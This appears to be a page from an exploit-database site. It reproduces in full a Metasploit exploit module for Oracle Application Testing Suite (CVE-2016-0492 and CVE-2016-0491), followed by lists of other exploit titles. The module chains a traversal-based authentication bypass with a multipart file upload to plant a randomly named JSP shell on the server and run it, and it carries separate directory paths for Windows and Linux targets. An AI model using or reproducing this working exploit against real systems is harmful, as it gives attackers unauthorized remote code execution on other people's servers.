Menu

Search for hundreds of thousands of exploits

"Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

java

Release date

Exploit published date

2016-05-25

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle ATS Arbitrary File Upload',
      'Description'    => %q{
        This module exploits an authentication bypass and arbitrary file upload
        in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
        unknown earlier versions, to upload and execute a JSP shell.
      },
      'Author'         => [
        'Zhou Yu', # Proof of concept
        'wvu'      # Metasploit module
      ],
      'References'     => [
        %w{CVE 2016-0492}, # Auth bypass
        %w{CVE 2016-0491}, # File upload
        %w{EDB 39691}      # PoC
      ],
      'DisclosureDate' => 'Jan 20 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => %w{win linux},
      'Arch'           => ARCH_JAVA,
      'Privileged'     => true,
      'Targets'        => [
        ['OATS <= 12.4.0.2.0 (Windows)', 'Platform' => 'win'],
        ['OATS <= 12.4.0.2.0 (Linux)',   'Platform' => 'linux']
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      Opt::RPORT(8088)
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/admin/Login.do'
    )

    if res && res.body.include?('12.4.0.2.0')
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_status("Uploading JSP shell to #{jsp_path}")
    upload_jsp_shell
    print_status("Executing JSP shell: #{full_uri}olt/pages/#{jsp_filename}")
    exec_jsp_shell
  end

  def upload_jsp_shell
    mime = Rex::MIME::Message.new
    mime.add_part('.jsp', nil, nil, 'form-data; name="storage.extension"')
    mime.add_part(jsp_filename, nil, nil, 'form-data; name="fileName1"')
    mime.add_part('', nil, nil, 'form-data; name="fileName2"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName3"') # Not needed
    mime.add_part('', nil, nil, 'form-data; name="fileName4"') # Not needed
    mime.add_part('*', nil, nil, 'form-data; name="fileType"')
    mime.add_part(payload.encoded, 'text/plain', nil,
                  %Q{form-data; name="file1"; filename="#{jsp_filename}"})
    mime.add_part('Default', nil, nil, 'form-data; name="storage.repository"')
    mime.add_part('.', nil, nil, 'form-data; name="storage.workspace"')
    mime.add_part(jsp_directory, nil, nil, 'form-data; name="directory"')

    register_files_for_cleanup(jsp_path)

    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/olt/Login.do/../../olt/UploadFileUpload.do',
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => mime.to_s
    )
  end

  def exec_jsp_shell
    send_request_cgi(
      'method' => 'GET',
      'uri'    => "/olt/pages/#{jsp_filename}"
    )
  end

  def jsp_directory
    case target['Platform']
    when 'win'
      '..\\oats\\servers\\AdminServer\\tmp\\_WL_user\\oats_ee\\1ryhnd\\war\\pages'
    when 'linux'
      '../oats/servers/AdminServer/tmp/_WL_user/oats_ee/1ryhnd/war/pages'
    end
  end

  def jsp_filename
    @jsp_filename ||= Rex::Text.rand_text_alpha(8) + '.jsp'
  end

  def jsp_path
    jsp_directory + "#{target['Platform'] == 'win' ? '\\' : '/'}" + jsp_filename
  end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-02 "Apache Flink 1.9.x - File Upload RCE (Unauthenticated)" webapps java bigger.wing
2020-10-29 "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request" webapps java "Mohammed Althibyani"
2020-10-20 "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution" webapps java "Jonatas Fil"
2020-10-19 "Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in" webapps java "Daniel Morris"
2020-09-09 "Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)" webapps java V1n1v131r4
2020-09-07 "ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)" webapps java Hodorsec
2020-08-10 "ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)" webapps java "Bhadresh Patel"
2020-07-26 "ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection" webapps java aldorm
2020-07-07 "Exhibitor Web UI 1.7.1 - Remote Code Execution" webapps java "Logan Sanderson"
2020-06-04 "VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution" webapps java "Tomas Melicher"
Release Date Title Type Platform Author
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected